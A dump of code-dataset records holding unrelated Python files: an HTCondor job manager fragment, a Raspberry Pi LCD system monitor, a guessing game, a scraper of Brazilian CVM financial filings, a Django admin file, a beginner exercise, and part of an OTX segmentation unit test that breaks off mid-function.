self.clusterprocids_finished\n\n def failed_runids(self, runids):\n # remove failed clusterprocids from self.clusterprocids_finished\n # so that len(self.clusterprocids_finished)) becomes the number\n # of the successfully finished jobs\n for i in runids:\n try:\n self.clusterprocids_finished.remove(i)\n except ValueError:\n pass\n\n def terminate(self):\n clusterids = clusterprocids2clusterids(self.clusterprocids_outstanding)\n ids_split = split_ids(clusterids)\n statuses = [ ]\n for ids_sub in ids_split:\n procargs = ['condor_rm'] + ids_sub\n command_display = compose_shortened_command_for_logging(procargs)\n logger = logging.getLogger(__name__)\n logger.debug('execute: {}'.format(command_display))\n proc = subprocess.Popen(\n procargs,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE\n )\n stdout, stderr = proc.communicate()\n\n##__________________________________________________________________||\ndef clusterprocids2clusterids(clusterprocids):\n return list(set([i.split('.')[0] for i in clusterprocids]))\n\n##__________________________________________________________________||\ndef query_status_for(ids, n_at_a_time=500):\n\n ids_split = split_ids(ids, n=n_at_a_time)\n stdout = [ ]\n for ids_sub in ids_split:\n procargs = ['condor_q'] + ids_sub + ['-format', '%d.', 'ClusterId', '-format', '%d ', 'ProcId', '-format', '%-2s\\n', 'JobStatus']\n stdout.extend(try_executing_until_succeed(procargs))\n\n # e.g., stdout = ['688244.0 1 ', '688245.0 1 ', '688246.0 2 ']\n\n ret = [l.strip().split() for l in stdout]\n # e.g., [['688244.0', '1'], ['688245.0', '1'], ['688246.0', '2']]\n\n ret = [[e[0], int(e[1])] for e in ret]\n # a list of [clusterprocid, status]\n # e.g., [['688244.0', 1], ['688245.0', 1], ['688246.0', 2]]\n\n return ret\n\n##__________________________________________________________________||\ndef change_job_priority(ids, priority=10, n_at_a_time=500):\n\n # http://research.cs.wisc.edu/htcondor/manual/v7.8/2_6Managing_Job.html#sec:job-prio\n\n ids_split = split_ids(ids, n=n_at_a_time)\n for ids_sub in ids_split:\n procargs = ['condor_prio', '-p', str(priority)] + ids_sub\n try_executing_until_succeed(procargs)\n\n##__________________________________________________________________||\ndef split_ids(ids, n=500):\n # e.g.,\n # ids = [3158174', '3158175', '3158176', '3158177', '3158178']\n # n = 2\n # return [[3158174', '3158175'], ['3158176', '3158177'], ['3158178']]\n return [ids[i:(i + n)] for i in range(0, len(ids), n)]\n\n##__________________________________________________________________||\n","sub_path":"alphatwirl/concurrently/HTCondorJobSubmitter.py","file_name":"HTCondorJobSubmitter.py","file_ext":"py","file_size_in_byte":9266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"9365835","text":"#!/usr/bin/env python\n\n# https://gist.github.com/transilluminate/bbc1eca2739badaadf58\n\nimport time, colorsys, psutil, subprocess\nimport dot3k.lcd as lcd\nimport dot3k.backlight as backlight\nfrom dot3k.menu import Menu, MenuOption\n\ndef run_cmd(cmd):\n\tp = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\toutput = p.communicate()[0].rstrip()\n\treturn output\n\ndef millis():\n\treturn int(round(time.time() * 1000.0))\n\ndef lcd_colour(percent):\n\tf = float(percent) / 100\n\t# there's a good colour change between these hues on a dot3k *RBG* display:\n\tstart = 270\n\tend = 330\n\tstep = end - start\n\thue = (start + (f * step)) / 360\n\tbacklight.hue(hue)\n\ndef bytes2human(n):\n\t# 
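# Offline exercise of the two pure-Python pieces above: the regex that parses
# condor_submit output and the chunking in split_ids; the stdout sample is
# made up to match the expected format.
import re

stdout = 'Submitting job(s)....\n4 job(s) submitted to cluster 3158626'
regex = re.compile(r'(\d+) job\(s\) submitted to cluster (\d+)', re.MULTILINE)
njobs, clusterid = regex.search(stdout).groups()
assert (int(njobs), clusterid) == (4, '3158626')

ids = ['3158174', '3158175', '3158176', '3158177', '3158178']
assert [ids[i:i + 2] for i in range(0, len(ids), 2)] == [
    ['3158174', '3158175'], ['3158176', '3158177'], ['3158178']]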
http://code.activestate.com/recipes/578019\n\tsymbols = ('K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')\n\tprefix = {}\n\tfor i, s in enumerate(symbols):\n\t\tprefix[s] = 1 << (i + 1) * 10\n\tfor s in reversed(symbols):\n\t\tif n >= prefix[s]:\n\t\t\tvalue = float(n) / prefix[s]\n\t\t\treturn '%.0f%s' % (value, s)\n\t\t\treturn \"%sB\" % n\n\nclass cpu_info(MenuOption):\n\t\n\tdef begin(self):\n\t\tself.load_average_5m = run_cmd(\"uptime | grep -ohe 'load average[s:][: ].*' | awk '{ print $4 }'| tr -d ','\")\n\t\n\tdef get_cpu_temp(self):\n\t\ttempFile = open(\"/sys/class/thermal/thermal_zone0/temp\")\n\t\tcpu_temp = tempFile.read()\n\t\ttempFile.close()\n\t\treturn int(cpu_temp) / 1000\n\t\t\n\tdef redraw(self,menu):\n\t\tcpu_percent = psutil.cpu_percent(interval=0)\n\t\tcpu_temp = self.get_cpu_temp()\n\t\t\n\t\tlcd_colour(cpu_percent)\n\t\tmenu.write_row(0,'-= CPU =-')\n\t\tmenu.write_row(1,'Load: %.0f%% (%s)' % (cpu_percent, self.load_average_5m))\n\t\tmenu.write_row(2,'Temp: %s C' % str(cpu_temp))\n\nclass memory_info(MenuOption):\n\t\n\tdef redraw(self,menu):\n\t\tavailable_memory = bytes2human(psutil.virtual_memory().available)\n\t\tactive_memory = bytes2human(psutil.virtual_memory().active)\n\t\tpercent_used = psutil.virtual_memory().percent\n\t\tpercent_free = 100 - percent_used\n\t\t\n\t\tlcd_colour(percent_used)\n\t\tmenu.write_row(0,'-= RAM =-')\n\t\tmenu.write_row(1,'Used: %s (%.0f%%)' % (active_memory, percent_used))\n\t\tmenu.write_row(2,'Free: %s (%.0f%%)' % (available_memory, percent_free))\n\nclass disk_info(MenuOption):\n\t\n\tdef redraw(self,menu):\n\t\tpercent_used_root = psutil.disk_usage('/').percent\n\t\tpercent_used_usb = psutil.disk_usage('/mnt/SandiskUSB').percent\n\t\t\n\t\tlcd_colour(percent_used_root)\n\t\tmenu.write_row(0,'-= HDD =-')\n\t\tmenu.write_row(1,'Used (/): %.0f%%' % percent_used_root)\n\t\tmenu.write_row(2,'Used (USB): %.0f%%' % percent_used_usb)\n\nclass network_info(MenuOption):\n\t\n\tdef __init__(self,interface):\n\t\tself.interface = interface\n\t\tMenuOption.__init__(self)\n\t\n\tdef begin(self):\n\t\tself.ip_address = run_cmd(\"ifconfig \" + self.interface + \" | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1}'\")\n\t\tself.ping = run_cmd(\"ping -c 1 -I \" + self.interface + \" 8.8.8.8 | grep time= | awk '{ print $7 }' | cut -d'=' -f2\")\n\t\t\n\t\tif not self.ip_address:\n\t\t\tself.ip_address = 'No IP address!' 
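# The recipe above appears to have its byte-count fallback indented inside the
# loop, where it can never run; a corrected, self-contained rendering of the
# same conversion:
def bytes2human(n):
    symbols = ('K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')
    prefix = {s: 1 << (i + 1) * 10 for i, s in enumerate(symbols)}
    for s in reversed(symbols):
        if n >= prefix[s]:
            return '%.0f%s' % (float(n) / prefix[s], s)
    return '%sB' % n

assert bytes2human(10) == '10B'
assert bytes2human(2048) == '2K'
assert bytes2human(3 * 1024 * 1024) == '3M'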
\n\t\t\n\t\ttry:\n\t\t\tself.ping = float(self.ping)\n\t\texcept:\n\t\t\tpass\n\t\t\n\t\t# define screen colours based on ping values, arbitrarily: 0-20=good, 20-40=ok, 40-100=hmm, >100=crap\n\t\tif 0 <= self.ping < 20:\n\t\t\tself.colour = 0\n\t\telif 20 <= self.ping < 40:\n\t\t\tself.colour = 25\n\t\telif 40 <= self.ping < 100:\n\t\t\tself.colour = 50\n\t\telif self.ping <= 100:\n\t\t\tself.colour = 75\n\t\telse:\n\t\t\tself.colour = 100\t\t# unreachable\n\t\t\tself.ping = ';-( '\t# padd the 'ms' off the screen\n\t\t\t\n\t\t#self.connections = run_cmd(\"netstat -tun | grep -c ESTABLISHED\")\n\t\t#self.mac_address = run_cmd(\"ifconfig \" + self.interface + \" | grep HWaddr | awk '{ print $5 }' | sed s/://g\") \n\t\t\n\tdef redraw(self,menu):\n\t\tlcd_colour(self.colour)\n\t\tmenu.write_row(0,'-= ' + self.interface + ' =-')\n\t\tmenu.write_row(1,'%s' % self.ip_address) # xxx.xxx.xxx.xxx = 15 chars max\n\t\tmenu.write_row(2,'Ping: %s ms' % self.ping)\n\t\t#menu.write_row(2,'%s' % self.mac_address) # xx:xx:xx:xx:xx:xx (17 chars, have to remove ':')\n\t\t#menu.write_row(2,'%s connections' % self.connections)\n\nclass network_speed(MenuOption):\n\t\n\tdef __init__(self,interface):\n\t\tself.last_updated = 0\n\t\tself.raw_dlold = 0\n\t\tself.raw_ulold = 0\n\t\tself.tdelta = 0\n\t\tself.maxdlspeed = 1000\n\t\tself.percent_speed = 0\n\t\tself.interface = interface\n\t\tMenuOption.__init__(self)\n\t\t\n\tdef begin(self):\n\t\tself.download = bytes2human(int(run_cmd(\"ifconfig \" + self.interface + \" | grep bytes | awk '{ print $2 }' | cut -d':' -f2\")))\n\t\tself.upload = bytes2human(int(run_cmd(\"ifconfig \" + self.interface + \" | grep bytes | awk '{ print $6 }' | cut -d':' -f2\")))\n\t\t\n\tdef redraw(self,menu):\n\t\t\n\t\tif self.millis() - self.last_updated > 1000:\n\t\t\ttdelta = self.millis() - self.last_updated\n\t\t\tself.last_updated = self.millis()\n\t\t\traw_dlnew = run_cmd(\"ifconfig \" + self.interface + \" | grep bytes | cut -d':' -f2 | cut -d' ' -f1\")\n\t\t\traw_ulnew = run_cmd(\"ifconfig \" + self.interface + \" | grep bytes | cut -d':' -f3 | cut -d' ' -f1\")\n\t\t\tself.dlspeed = 0\n\t\t\tself.ulspeed = 0\n\t\t\ttry:\n\t\t\t\tddelta = int(raw_dlnew) - int(self.raw_dlold)\n\t\t\t\tudelta = int(raw_ulnew) - int(self.raw_ulold)\n\t\t\t\tself.dlspeed = round(float(ddelta) / float(tdelta), 1)\n\t\t\t\tself.ulspeed = round(float(udelta) / float(tdelta), 1)\n\t\t\texcept ValueError:\n\t\t\t\tpass\n\t\t\t\n\t\t\tif self.dlspeed > self.maxdlspeed:\n\t\t\t\tself.maxdlspeed = self.dlspeed\n\t\t\t\n\t\t\tself.percent_speed = self.dlspeed / self.maxdlspeed * 100\n\t\t\t#print \"speed %s / %s (%s)\" % (self.dlspeed,self.maxdlspeed,self.percent_speed)\n\t\t\tself.raw_dlold = raw_dlnew\n\t\t\tself.raw_ulold = raw_ulnew\n\t\t\n\t\tlcd_colour(self.percent_speed)\n\t\tmenu.write_row(0,'-= ' + self.interface + ' =-')\n\t\tmenu.write_row(1,'Dn:%s %skB/s' % (self.download,self.dlspeed))\n\t\tmenu.write_row(2,'Up:%s %skB/s' % (self.upload,self.ulspeed))\n\n#class sample_info(MenuOption):\n#\t\n#\tdef begin(self):\n#\t\tself.slowvar = run_cmd(\"\") # runs once per menu change, for slowly updating info\n#\t\t\n#\tdef redraw(self,menu):\n#\t\n#\t\tself.fastvar = run_cmd(\"\") # updated every screen refresh, for rapidly changing data\n#\t\n#\t\tlcd_colour(0)\t# displays warning colour background, set this to a range 0..100, 0 = green, 100 = red\n#\t\tmenu.write_row(0,'-= AFP =-')\n#\t\tmenu.write_row(1,'slow: %s' % self.slowvar)\n#\t\tmenu.write_row(2,'fast: %s' % self.fastvar)\n\nmenu = 
Menu({\n\t\t'1': cpu_info(),\n\t\t'2': memory_info(),\n\t\t'3': disk_info(),\n\t\t'4': network_info('wlan0'),\n\t\t'5': network_speed('wlan0'),\n\t\t'6': network_info('eth0'),\n\t\t'7': network_speed('eth0'),\n\t\t},\n\tlcd, None, 30)\n\nmenu_display_time = 4\t# in seconds\nupdate_frequency = 5\t# hz of screen update\nlast_cycled = 0\t\t\t# force immediate update of screen menu\n\n#try:\nwhile True:\n\tif millis() > last_cycled + (menu_display_time * 1000.0):\n\t\tmenu.cancel()\n\t\tmenu.down()\n\t\tmenu.right()\n\t\tlast_cycled = millis()\n\telse:\n\t\tmenu.redraw()\n\ttime.sleep(1 / float(update_frequency))\n#except:\n#\tlcd.clear()\n#\tbacklight.rgb(0,0,0)\n","sub_path":"pi_settings/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":6744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"429039381","text":"import datetime\nimport random\nimport json\n\nplayer_name = input(f\"Hello, what's your name? \")\nsecret = random.randint(1, 30)\nattempts = 0\nwrong_guesses = []\n\nwith open(\"score_list.txt\", \"r\") as score_file:\n score_list = json.loads(score_file.read())\n ordered_score_list = sorted(score_list, key=lambda t: t['attempts'])[:3]\n\n for score_dict in ordered_score_list:\n print(f'attempts: {score_dict[\"attempts\"]}, date: {score_dict.get(\"date\")}, name: {score_dict.get(\"name\")}, secret number: {score_dict.get(\"secret_number\")}, wrong guesses: {score_dict.get(\"wrong_guesses\")}')\n\nwhile True:\n guess = int(input(\"Guess the secret number (between 1 and 30): \"))\n attempts += 1\n\n if guess == secret:\n print(f\"You've guessed it - congratulations! It's number {secret}\")\n print(f\"Attempts needed: {attempts}\")\n score_list.append(\n {\n \"attempts\": attempts,\n \"date\": str(datetime.datetime.now()),\n \"name\": player_name,\n \"secret_number\": secret,\n \"wrong_guesses\": wrong_guesses\n }\n )\n\n with open(\"score_list.txt\", \"w\") as score_file:\n score_file.write(json.dumps(score_list))\n break\n elif guess > secret:\n print(\"Your guess is not correct... try something smaller\")\n elif guess < secret:\n print(\"Your guess is not correct... 
try something bigger\")\n\n wrong_guesses.append(guess)\n","sub_path":"random_with_dict.py","file_name":"random_with_dict.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"82024817","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom utils import getEnterprises,getTables,header2Keys,openUrl,buildUrl,parseFinancialTable,getRows,rowToDict,configureLog,getAll\nfrom utils import URL_EDETAIL, URL_EPATH, URL_ES, INDEX_FD\nfrom lxml.html import fromstring, tostring, HtmlElement\nfrom datetime import datetime\nfrom elasticsearch import Elasticsearch\nimport re\nimport urlparse\nimport logging\nfrom requests.utils import quote\nfrom urllib import urlencode\n\n#URLS\nURL_RAD = 'https://www.rad.cvm.gov.br/ENET/'\nURL_DCC = URL_RAD + 'frmDadosComposicaoCapitalITR.aspx'\nURL_FDF = URL_RAD + 'frmDemonstracaoFinanceiraITR.aspx'\nURL_RDF = URL_EPATH + 'ResumoDemonstrativosFinanceiros.aspx'\nURL_DF = URL_EPATH + 'HistoricoFormularioReferencia.aspx'\n\n#DIVS\nDIV_DFPS = 'ctl00_contentPlaceHolderConteudo_divDemonstrativo'\nTABLE_BPP = 'ctl00_cphPopUp_tbDados'\n\n#REGEX\nRE_PT1 = re.compile(\"[^']+'([^']+)'\\)\")\nRE_LOC = re.compile(\"window.frames\\[0\\]\\.location='([^']+)'\")\n\nPARMS_GERAL = 'Grupo=.&Quadro=.&NomeTipoDocumento=.&Titulo=.&Empresa=.&DataReferencia=.&Versao=.'\nPARMS_GERAL_ITR = 'Grupo=.&Quadro=.&NomeTipoDocumento=ITR&Titulo=.&Empresa=.&DataReferencia=.&Versao=.'\nPARMS_BPP = 'Periodo=0&CodTipoDocumento=4&CodigoTipoInstituicao=2'\n\ndef mycmp(x, y):\n return cmp(x['date'], y['date']) if x['date'] != y['date'] else cmp(x['version'], y['version'])\n\ndef parseFd(fd):\n d = fd.text.split(' - ')\n v = d[2].split()\n v = 0.0 if len(v) < 2 else float(v[1])\n return {'date': datetime.strptime(d[0], '%d/%m/%Y'), 'type': d[1], 'version': v, \n 'url': RE_PT1.match(fd.get('href')).group(1)}\n\ndef getDFPs(edp):\n page = openUrl(buildUrl(URL_DF, 'codigoCVM=' + edp, 'idioma=pt-br', 'tipo=dfp'))\n return [parseFd(dfp) for dfp in page.findall('.//div[@id=\"' + DIV_DFPS + '\"]/div/div/div/div/p/a')]\n\ndef getITRs(edp):\n page = openUrl(buildUrl(URL_DF, 'codigoCVM=' + edp, 'idioma=pt-br', 'tipo=itr'))\n return [parseFd(itr) for itr in page.findall('.//div[@id=\"' + DIV_DFPS + '\"]/div/div/div/div/p/a')]\n\ndef toInt(n):\n if n == '': return 0\n return int(n.replace('.', ''))\n\ndef getMultiplicador(root):\n em = HtmlElement(root).get_element_by_id('TituloTabelaSemBorda')\n return 1000 if em is not None and em.text.find('Mil') != -1 else 1\n\ndef getFdByIdAndYear(es, companyid, year, document_type='DFP'):\n logging.info('Getting financial data for company id %s and year %s', companyid, year)\n query = 'id: {0} AND period: {1}'.format(companyid, year)\n ret = [i for i in getAll(es, index=INDEX_FD, doc_type=document_type, q=query)]\n return ret[0] if len(ret) > 0 else None\n\n\ndef getDfpConBPA(url, infos):\n logging.info('Getting DFs Consolidadas - Balanco Patrimonial Ativo')\n t = dict()\n page = HtmlElement(openUrl(url)) \n table = page.get_element_by_id(TABLE_BPP)\n for row in getRows(table): rowToDict(row, t)\n\n # Multiplicador\n m = getMultiplicador(page)\n\n # Caixa\n cxa = toInt(t['1.01.01'][1])*m if '1.01.01' in t else 0\n apf = toInt(t['1.01.02'][1])*m if '1.01.02' in t else 0\n infos['CAIXA'] = cxa + apf\n\ndef getDfpConBPP(url, infos):\n logging.info('Getting DFs Consolidadas - Balanco Patrimonial Passivo')\n t = dict()\n page = openUrl(url) \n table = 
HtmlElement(page).get_element_by_id(TABLE_BPP)\n    for row in getRows(table): rowToDict(row, t)\n\n    # Multiplicador\n    m = getMultiplicador(page)\n\n    # Patrimonio Liquido\n    infos['PL'] = toInt(t['2.03'][1])*m if '2.03' in t else 0\n    # Divida Bruta\n    CP = toInt(t['2.01.04'][1])*m if '2.01.04' in t else 0\n    LP = toInt(t['2.02.01'][1])*m if '2.02.01' in t else 0\n    infos['DB'] = CP + LP\n    # Dividendos\n    Div = toInt(t['2.01.05.02.01'][1])*m if '2.01.05.02.01' in t else 0\n    infos['DIV'] = Div\n\ndef getDftDemRes(url, infos):\n    logging.info('Getting DFs Consolidadas - Demonstracao do Resultado')\n    t = dict()\n    page = openUrl(url) \n    table = HtmlElement(page).get_element_by_id(TABLE_BPP)\n    for row in getRows(table): rowToDict(row, t)\n\n    # Multiplicador\n    m = getMultiplicador(page)\n\n    # Receita Liquida\n    infos['RL'] = toInt(t['3.01'][1])*m if '3.01' in t else 0\n    # Lucro Liquido\n    infos['LL'] = next((toInt(v[1])*m for k,v in t.iteritems() if re.match('^Lucro.+odo$', v[0])), 0)\n\ndef getDaeCc(nsd, nsr, infos):\n    logging.info('Getting Dados da Empresa - Composicao do Capital - %s %s', nsd, nsr)\n    page = HtmlElement(openUrl(buildUrl(URL_DCC, PARMS_GERAL, PARMS_BPP, PARMS_BPP,\n        'NumeroSequencialDocumento=' + nsd, 'NumeroSequencialRegistroCvm=' + nsr)))\n    \n    # Multiplicador \n    em = page.xpath('.//div[@id=\"UltimaTabela\"]/table/tr/td/b/text()')\n    m = 1000 if len(em) > 0 and em[0].find('(Mil)') != -1 else 1\n\n    for i in ['QtdAordCapiItgz', 'QtdAprfCapiItgz', 'QtdTotAcaoCapiItgz', 'QtdAordTeso', 'QtdAprfTeso', 'QtdTotAcaoTeso']: \n        # pass a default so a missing field returns None instead of raising KeyError\n        qnt = page.get_element_by_id('ctl00_cphPopUp_{0}_1'.format(i), None)\n        infos[i] = 0 if qnt is None else toInt(qnt.text) * m\n\ndef escapeUrl(url):\n    up = urlparse.urlparse(url)\n    upl = urlparse.parse_qsl(up.query)\n    up2 = up._replace(query=urlencode(upl))\n    return up2.geturl()\n\ndef getLinks(url):\n    resp = dict()\n    trp = openUrl(url, True)\n    url_fdf = RE_LOC.search(trp).group(1)\n\n    params = urlparse.parse_qs(urlparse.urlparse(url_fdf).query)\n    resp['ctd'] = params['CodTipoDocumento'][0]\n    resp['nsd'] = params['NumeroSequencialDocumento'][0]\n    resp['nsr'] = params['NumeroSequencialRegistroCvm'][0]\n    resp['cti'] = params['CodigoTipoInstituicao'][0]\n    fparams = '&CodTipoDocumento={0}&NumeroSequencialDocumento={1}&'\\\n        'NumeroSequencialRegistroCvm={2}&CodigoTipoInstituicao={3}'.\\\n        format(resp['ctd'], resp['nsd'], resp['nsr'], resp['cti'])\n    \n    for i in re.findall('\"Text\":\"([^\"]+)\",\"Value\":\"([^\"]+)\"', trp):\n        if re.match('^Balan.+Ativo$', i[0]): resp['dfp_bpa'] = escapeUrl(URL_RAD + i[1] + fparams)\n        if re.match('^Balan.+Passivo$', i[0]): resp['dfp_bpp'] = escapeUrl(URL_RAD + i[1] + fparams)\n        if re.match('^Demonstra.+Resultado$', i[0]): resp['dfp_dr'] = escapeUrl(URL_RAD + i[1] + fparams)\n    \n    return resp\n\n# Infos By Year\ndef getDfpInfos(edp):\n    logging.info('Getting DFP Infos for %s', edp)\n    # Getting newer version of documents\n    dfps = dict([(i['date'], i) for i in sorted(getDFPs(edp), cmp=mycmp) if i['version'] > 0.0])\n    for year, dfp in dfps.iteritems():\n        logging.info('Getting DFP of %s for %s', edp, year.year)\n        if getFdByIdAndYear(es, edp, year.year) is not None:\n            logging.info('Already have DFP, skipping...')\n            continue \n\n        # Get NSD and NSR\n        links = getLinks(dfp['url'])\n\n        infos = dict()\n        infos['id'] = edp\n        infos['period'] = str(year.year)\n        infos['ptype'] = 'DFP'\n        # Get Infos From DFPs Consolidadas - Balanco Patrimonial Ativo\n        getDfpConBPA(links['dfp_bpa'], infos)\n        # Get Infos From DFPs Consolidadas - Balanco Patrimonial Passivo\n        
getDfpConBPP(links['dfp_bpp'], infos)\n        # Get Infos From DFPs Consolidadas - Demonstracao do Resultado\n        getDftDemRes(links['dfp_dr'], infos)\n        # Get Infos From Dados da Empresa - Composicao do Capital\n        getDaeCc(links['nsd'], links['nsr'], infos)\n        \n        yield infos\n        \n# Infos By Trimestre\ndef getItrInfos(edp):\n    logging.info('Getting ITR Infos for %s', edp)\n    \n    # Getting newer version of documents\n    itrs = dict([(i['date'], i) for i in sorted(getITRs(edp), cmp=mycmp) if i['version'] > 0.0])\n    for dt, itr in itrs.iteritems():\n        tm = '{:%Y%m}'.format(dt)\n        logging.info('Getting ITR of %s for %s', edp, tm)\n\n        if getFdByIdAndYear(es, edp, tm, 'ITR') is not None:\n            logging.info('Already have ITR, skipping...')\n            continue\n\n        # Get NSD and NSR\n        links = getLinks(itr['url'])\n\n        infos = dict()\n        infos['id'] = edp\n        infos['period'] = tm\n        infos['ptype'] = 'ITR'\n        # Get Infos From DFPs Consolidadas - Balanco Patrimonial Ativo\n        getDfpConBPA(links['dfp_bpa'], infos)\n        # Get Infos From DFPs Consolidadas - Balanco Patrimonial Passivo\n        getDfpConBPP(links['dfp_bpp'], infos)\n        # Get Infos From DFPs Consolidadas - Demonstracao do Resultado\n        getDftDemRes(links['dfp_dr'], infos)\n        # Get Infos From Dados da Empresa - Composicao do Capital\n        getDaeCc(links['nsd'], links['nsr'], infos)\n        \n        yield infos\n\ndef getInfos(enterprise):\n    edp = enterprise[0]\n    for i in getDfpInfos(edp): yield i\n    for i in getItrInfos(edp): yield i\n\ndef saveInfos(es, e):\n    logging.info('Saving Enterprise %s period %s', e['id'], e['period'])\n    e['register_date'] = datetime.now()\n    eid = '{0}-{1}'.format(e['id'], e['period'])\n    es.index(index=INDEX_FD, id=eid, doc_type=e['ptype'], body=e)\n\nif __name__ == '__main__':\n    configureLog()\n\n    es = Elasticsearch([URL_ES])\n    for enterprise in getEnterprises():\n        try:\n            logging.info('Getting Company %s', str(enterprise[0]))\n            for info in getInfos(enterprise): saveInfos(es, info)\n        except Exception as error: \n            logging.error('Exception Getting Company %s', error)\n\n    logging.info('Done, exiting...')\n","sub_path":"src/getfinancialdata.py","file_name":"getfinancialdata.py","file_ext":"py","file_size_in_byte":9235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"392405323","text":"from django.contrib import admin\n\nfrom .models import Image, Comment, Like\n\n# Register your models here.\n\n@admin.register(Image)\nclass Image_Admin(admin.ModelAdmin):\n    list_display_links = (\n        'location',\n    )\n\n    list_display = (\n        'id',\n        'file',\n        'location',\n        'caption',\n        'creator',\n        'created_at',\n        'updated_at'\n    )\n\n@admin.register(Comment)\nclass Comment_Admin(admin.ModelAdmin):\n    pass\n\n@admin.register(Like)\nclass Like_Admin(admin.ModelAdmin):\n\n    list_display = (\n        'creator',\n        'image',\n    )\n","sub_path":"nomadgram/nomadgram/images/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"16263361","text":"import random\r\n\r\nn1 = random.randrange(1,10)\r\nn2 = random.randrange(1,17)\r\nif(n1>n2):\r\n\tif(n1>5):\r\n\t\tprint('greater than 5')\r\n\telse:\r\n\t\tprint('greater than n2 but not greater than 5')\r\nelse:\r\n\tprint('less than n2')\r\n\r\nif(n2>n1):\r\n\tprint(\"n2 is greater\")\r\nelse:\r\n\tprint(\"n1 is greater\")\r\n\r\nif(n2>n1):\r\n\tprint(\"n1 is best\")\r\nelif(n2>(n1+2)):\r\n\tprint(\"pretty cool!\")\r\nelse:\r\n\tprint('n2 is 
best')","sub_path":"PythonPracsTy/prac3.py","file_name":"prac3.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"114585172","text":"# Copyright (C) 2021-2023 Intel Corporation\n# SPDX-License-Identifier: Apache-2.0\n#\nimport numpy as np\nimport pytest\n\nfrom otx.algorithms.segmentation.adapters.mmseg.data.dataset import (\n OTXSegDataset,\n get_annotation_mmseg_format,\n)\nfrom otx.api.entities.annotation import (\n Annotation,\n AnnotationSceneEntity,\n AnnotationSceneKind,\n)\nfrom otx.api.entities.dataset_item import DatasetItemEntity\nfrom otx.api.entities.datasets import DatasetEntity\nfrom otx.api.entities.image import Image\nfrom otx.api.entities.label import Domain, LabelEntity\nfrom otx.api.entities.scored_label import ScoredLabel\nfrom otx.api.entities.shapes.rectangle import Rectangle\nfrom tests.test_suite.e2e_test_system import e2e_pytest_unit\nfrom tests.unit.api.parameters_validation.validation_helper import (\n check_value_error_exception_raised,\n)\n\n\ndef label_entity():\n return LabelEntity(name=\"test label\", domain=Domain.SEGMENTATION)\n\n\ndef dataset_item():\n image = Image(data=np.random.randint(low=0, high=255, size=(10, 16, 3)))\n annotation = Annotation(shape=Rectangle.generate_full_box(), labels=[ScoredLabel(label_entity())])\n annotation_scene = AnnotationSceneEntity(annotations=[annotation], kind=AnnotationSceneKind.ANNOTATION)\n return DatasetItemEntity(media=image, annotation_scene=annotation_scene)\n\n\nclass TestOTXSegDatasetInputParamsValidation:\n @staticmethod\n def dataset():\n return OTXSegDataset(\n otx_dataset=DatasetEntity(),\n pipeline=[{\"type\": \"LoadImageFromFile\", \"to_float32\": True}],\n classes=[\"class_1\", \"class_2\"],\n )\n\n @e2e_pytest_unit\n def test_otx_dataset_init_params_validation(self):\n \"\"\"\n Description:\n Check OTXSegDataset object initialization parameters validation\n\n Input data:\n OTXSegDataset object initialization parameters with unexpected type\n\n Expected results:\n Test passes if ValueError exception is raised when unexpected type object is specified as\n OTXSegDataset object initialization parameter\n \"\"\"\n correct_values_dict = {\n \"otx_dataset\": DatasetEntity(),\n \"pipeline\": [{\"type\": \"LoadImageFromFile\", \"to_float32\": True}],\n }\n unexpected_str = \"unexpected string\"\n unexpected_int = 1\n unexpected_values = [\n # Unexpected string is specified as \"otx_dataset\" parameter\n (\"otx_dataset\", unexpected_str),\n # Unexpected integer is specified as \"pipeline\" parameter\n (\"pipeline\", unexpected_int),\n # Unexpected string is specified as nested pipeline\n (\"pipeline\", [{\"config\": 1}, unexpected_str]),\n # Unexpected string is specified as \"classes\" parameter\n (\"classes\", unexpected_str),\n # Unexpected string is specified as nested class\n (\"classes\", [\"class_1\", unexpected_int]),\n # Unexpected string is specified as \"test_mode\" parameter\n (\"test_mode\", unexpected_str),\n ]\n check_value_error_exception_raised(\n correct_parameters=correct_values_dict,\n unexpected_values=unexpected_values,\n class_or_function=OTXSegDataset,\n )\n\n @e2e_pytest_unit\n def test_otx_dataset_filter_labels_params_validation(self):\n \"\"\"\n Description:\n Check OTXSegDataset object \"filter_labels\" method input parameters validation\n\n Input data:\n OTXSegDataset object, \"filter_labels\" method unexpected parameters\n\n Expected results:\n Test passes if ValueError exception is 
raised when unexpected type object is specified as\n input parameter for \"filter_labels\" method\n \"\"\"\n label = label_entity()\n dataset = self.dataset()\n correct_values_dict = {\n \"all_labels\": [label],\n \"label_names\": [\"label_1\", \"label_2\"],\n }\n unexpected_int = 1\n unexpected_values = [\n # Unexpected integer is specified as \"all_labels\" parameter\n (\"all_labels\", unexpected_int),\n # Unexpected integer is specified as nested label\n (\"all_labels\", [label, unexpected_int]),\n # Unexpected integer is specified as \"label_names\" parameter\n (\"label_names\", unexpected_int),\n # Unexpected integer is specified as nested name\n (\"label_names\", [\"label_1\", unexpected_int]),\n ]\n check_value_error_exception_raised(\n correct_parameters=correct_values_dict,\n unexpected_values=unexpected_values,\n class_or_function=dataset.filter_labels,\n )\n\n @e2e_pytest_unit\n def test_otx_dataset_pre_pipeline_params_validation(self):\n \"\"\"\n Description:\n Check OTXSegDataset object \"pre_pipeline\" method input parameters validation\n\n Input data:\n OTXSegDataset object, \"results\" unexpected type object\n\n Expected results:\n Test passes if ValueError exception is raised when unexpected type object is specified as\n input parameter for \"pre_pipeline\" method\n \"\"\"\n dataset = self.dataset()\n unexpected_int = 1\n for 